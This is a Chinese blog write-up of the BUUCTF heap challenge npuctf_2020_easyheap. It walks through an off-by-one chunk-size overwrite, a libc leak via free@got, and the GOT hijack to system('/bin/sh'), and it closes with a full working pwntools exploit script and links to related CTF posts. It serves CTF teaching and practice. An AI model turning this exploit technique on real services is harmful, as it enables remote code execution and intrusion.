[BUUCTF]PWN——npuctf_2020_easyheap

最新推荐文章于 2023-05-30 16:39:42 发布
最新推荐文章于 2023-05-30 16:39:42 发布
阅读量798 收藏 3
点赞数 4
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/112851757
版权
本文详细介绍了如何利用64位程序的off-by-one漏洞和堆块重叠,通过修改chunk大小和地址,泄露libc并计算system函数地址,最终执行`system('/bin/sh')`获取shell的过程。涉及的技术包括ida分析、内存布局操控和libc利用。
摘要由CSDN通过智能技术生成

npuctf_2020_easyheap

附件

步骤:

  1. 例行检查,64位程序,开启了canary和nx
    在这里插入图片描述
  2. 本地试运行一下,看看大概的情况,经典的堆题的菜单
    在这里插入图片描述
  3. 64位ida载入
    add()
    在这里插入图片描述
    edit()在这里插入图片描述
    show()
    在这里插入图片描述
    delete()
    在这里插入图片描述

利用思路

  1. 通过 off by one 漏洞,修改下一个 chunk 的 size 为 0x41 大小,这样 free 之后就能造成堆块重叠。
  2. 通过堆块重叠,修改记录 size 与 chunk_addr 的 chunk 中的 chunk_addr 为 free函数的 got 表地址,然后通过show打印泄露libc
  3. 获取libc后就能计算出system的地址,再次通过off-by-one修改free@got为 system 的地址,当主函数再次执行delete(chunk2)的时候,结合 “/bin/sh” 参数,实现 system(’/bin/sh’) 获取shell

利用过程

  1. 构造堆块重叠
    创建堆块
add(0x18,'aaaa')
add(0x18,'bbbb')
add(0x18,'/bin/sh\x00')

此时堆的布局
在这里插入图片描述
利用off-by-one,通过修改chunk0来修改chunk1的size,这样释放chunk1的话就会构成重叠堆

edit(0,'a'*0x18+'\x41')
delete(1)

此时的堆布局
在这里插入图片描述

  1. 构造好重叠堆块后,通过编辑new_chunk_1来将记录chunk2地址的地方改为free@got,然后通过show来泄露libc,有了libc就可以计算system函数的地址了
payload='a'*0x10+p64(0)+p64(0x21)+p64(0x100)+p64(elf.got['free'])
add(0x38,payload)
show(1)

p.recvuntil('Content : ')
libcbase=u64(p.recvuntil('\x7f').ljust(8,'\x00'))-libc.symbols['free']
system_addr=libcbase+libc.symbols['system']

此后的堆布局,已经将chunk1_addr改成了free@got的地址
在这里插入图片描述

  1. 最后修改free@got的地址为system的地址,然后执行delete(chunk2),从而执行了system(‘/bin/sh’),获取了shell
edit(1,p64(system_addr))
delete(2)
p.interactive()

成功将free@got地址改成了system地址
在这里插入图片描述

完整exp:

from pwn import * 

p=process('./npuctf_2020_easyheap')
#p=remote('node3.buuoj.cn',28132)

elf=ELF('./npuctf_2020_easyheap')
context.log_level="debug"
libc=ELF('./libc-2.27-64.so')

def add(size,content):
	p.sendlineafter('Your choice :',str(1))
	p.sendlineafter('Size of Heap(0x10 or 0x20 only) : ',str(size))
	p.sendlineafter('Content:',content)

def edit(index,content):
	p.sendlineafter('Your choice :',str(2))
	p.sendlineafter('Index :',str(index))
	p.recvuntil("Content: ")
	p.send(content)

def show(idx):
	p.sendlineafter('Your choice :',str(3))
	p.sendlineafter('Index :',str(idx))

def delete(idx):
	p.sendlineafter('Your choice :',str(4))
	p.sendlineafter('Index :',str(idx))

add(0x18,'aaaa')
add(0x18,'bbbb')
add(0x18,'/bin/sh\x00')

edit(0,'a'*0x18+'\x41')
delete(1)

payload='a'*0x10+p64(0)+p64(0x21)+p64(0x100)+p64(elf.got['free'])
add(0x38,payload)
#gdb.attach(p)
show(1)

p.recvuntil('Content : ')
libcbase=u64(p.recvuntil('\x7f').ljust(8,'\x00'))-libc.symbols['free']
system_addr=libcbase+libc.symbols['system']

edit(1,p64(system_addr))
#gdb.attach(p)
delete(2)
p.interactive()

在这里插入图片描述

BUUCTF [ZJCTF 2019]EasyHeap
BengDouLove的博客
04-08 2830
Partial RELRO 那说明got表可写,可以通过改写got表为想要的函数,堆通常的利用方法 还是老样子,一个堆块管理系统,main函数太长了不放了,就是根据你的输入选择操作 值得一提的是有个这个 这个函数能dedaoflag吗??一会再说,反正system是有了,不用泄露libc了 1.create 可以看到,堆块最多有十个,,还是用了一张表维护着堆块的指针,,这样就让人想把这个...
BUUCTF pwn——pwnable_orw
CNS-Enterprise BCC-1701-J
05-06 294
BUUCTF 做题练习
npuctf_2020_easyheap
qq_51687381的博客
07-27 294
这题的结构,像是hacknote 和之前一个easyheap的融合。 但是漏洞利用手法不太一样。之前的一个easyheap是利用fastbin里面的一种漏洞。伪造一个fake chunk。(这道题的原因是因为,就算伪造了一个fake chunk ,我们malloc时也无法利用它) 这次的漏洞:是将control chunk 和content chunk 对调,然后对control chunk攻击。 from pwn import * elf = ELF("./npuctf_2020_easyhea
npuctf_2020_easyheap详解
像初雪一样自由洒落
04-25 928
off by one的题,,, 参考视频:off by one + 改got表的heap做法 例题:npuctf_2020_easyheap 程序流程 create: 申请两个chunk: 一个heaparray[i](固定0x10大小),一个是申请的大小(只能申请0x18或0x38) edit: read_input(heaparray[(signed int)v1][1], *heaparray[(signed int)v1] + 1LL); 存在off by one show:根据id.
NPUCTF pwn
doudoudedi
04-21 776
题目质量很高萌新直接自闭 z这2道题都挺基础的 easy_heap exp: off by one 造成了任意地址写的漏洞 #!/usr/bin/python2 from pwn import * p=0 def pwn(): global p #p=process('./pwn') p=remote('ha1cyon-ctf.fun',30179) elf=ELF('./pwn') l...
BUUCTF-PWN gyctf_2020_bfnote(劫持TLS结构,ret2_dl_runtime_resolve)
weixin_44145820的博客
04-19 1675
目录程序分析背景知识延迟绑定Canary漏洞利用Exp 程序分析 一道带有canary的栈溢出题目 main函数是吧ebp-4中存放地址再减四获得的 调试结果如下 背景知识 延迟绑定 本题需要利用ret2al_runtime_resolve,涉及到延迟绑定的技术,简单介绍一下函数绑定的过程,以atol的调用为例 我们看一下第一次调用程序atol,此时atol_got存放着atol@plt+6...
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1023
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 365
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
BUUCTF_PWN_test_your_nc详细题解
qq_46238551的博客
10-20 3181
test_your_nc_1 IDA PRO查看主函数 发现system("/bin/sh"),从主函数进入则执行getshell,所以直接nc或者写一个交互程序都可以getshell。 gdb动态分析,b main下主函数断点,r运行,看一下跳转到system函数后具体的执行过程 n单步执行,将程序调整到运行system函数之前 n单步执行,运行system(“/bin/sh”),观察getshell 本地gdb调试成功后,运行exp拿到flag exp.py ``..
buuctf easyheap
weixin_44932880的博客
02-09 535
主要知识 堆块的结构,fastbin任意地址构造堆块的检查机制, 对题目流程的认真分析 1.检查文件没有地址偏移的保护 2.查看功能。 3.通过堆的溢出生成一块假堆块 4.假堆块可覆盖heaparray[0]为free的got表的地址. 5.通过更改heaparray[0]存的堆块的内容,将free的got覆盖为system的地址。 6.调用free函数并在前面将参数填充为"/bin/sh\x0...
buuoj刷题记录 - npuctf_2020_easyheap
qq_34010404的博客
03-26 202
题目给了add,show,edit,del函数 问题在edit函数里面,重新编辑的时候可以溢出一个字节 看一下create函数,只能分配大小为 24,和56的空间 思路:覆盖下一个chunk的chunksize低字节达到修改chunk的大小,free 的时候会放到更大的tcache bin里面,之后malloc的时候会造成chunk重叠. 下面是我的构造方法: 把利用 0 把1中chunk2的size 改掉,改成0x40, (一会malloc的时候用到,注意只能分配大小为 56 和 24 的空间,(8.
buuctf [ZJCTF 2019]EasyHeap
weixin_45677731的博客
08-24 990
这题只有add,edit,delete三个主体部分,没有show的部分 create_heap函数,chunk的指针保存在bss段的heaparray数组处 edit_heap函数,注意这里输入的数据长度是可以自己设置的,就可以随意溢出了 delete_heap函数 除此之外,还有这样一个l33t函数: 在程序中,你只要满足一定的条件,是可以运行这个函数的,我猜测在[ZJCTF 2019]比赛进行的时候可能这个函数是可以利用的,但现在在buu上面是用不了的,flag文件的目录不对。不过,这个sys
[BUUCTF]PWN——[ZJCTF 2019]EasyHeap
mcmuyanga的博客
12-16 509
[ZJCTF 2019]EasyHeap 附件 步骤: 例行检查,64位程序 试运行一下看看程序大概执行的情况,经典的堆块的菜单 64位ida载入,首先检索字符串,发现了读出flag的函数 看一下每个选项的函数 add 这边size的大小由我们输入控制,heaparray数组在bss段上存放着我们chunk的指针 edit,简单的根据指针修改对应chunk里的值,但是这里的size也是由我们手动输入的,也就是说只要我们这边输入的size比add的时候输入的size大就会造成溢出 delete,释
[BUUCTF-pwn]——[ZJCTF 2019]EasyHeap
Y_peak的博客
11-16 978
[BUUCTF-pwn]——[ZJCTF 2019]EasyHeap 思路 我们第一个想法肯定是执行l33t这个函数,事实证明被摆了一道。没有结果, 但是我们有system函数我们可以将其放入我们可以操控的函数,比如printf、puts、gets、free等函数的got表,通过传入/bin/sh来解决。利用uaf就可以达到其目的。 exploit from pwn import * context(os='linux',arch='amd64',log_level='debug') p = remot
BUUCTF pwn——[ZJCTF 2019]EasyHeap
CNS-Enterprise BCC-1701-J
05-30 304
BUUCTF 做题练习
npuctf_2020_level2
z1r0的博客
03-16 381
npuctf_2020_level2 查看保护 一个格式化字符串漏洞 攻击思路:因为buf不在栈上在bss上,所以这是一个bss上的格式化字符串漏洞。开了pie,所以可以先通过栈上数据泄露出格上地址和libc。接着改栈上数据将栈的链子给链到retaddr这里,然后改ret为one_gadget即可。 1.看一下栈上数据 libc的偏移为7,arg的链子偏移为9,泄露出这两个地址 2.将arg的这个链子最后的地址改成带有ret_addr的地址。 3.接着就是改ret_addr为one_gadget。 注
BUUCTF [ZJCTF 2019]EasyHeap 记第一次堆入门
weixin_45441024的博客
12-27 686
BUUCTF [ZJCTF 2019]EasyHeap 记第一次堆入门 一般的堆题都是这种表单形式的
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值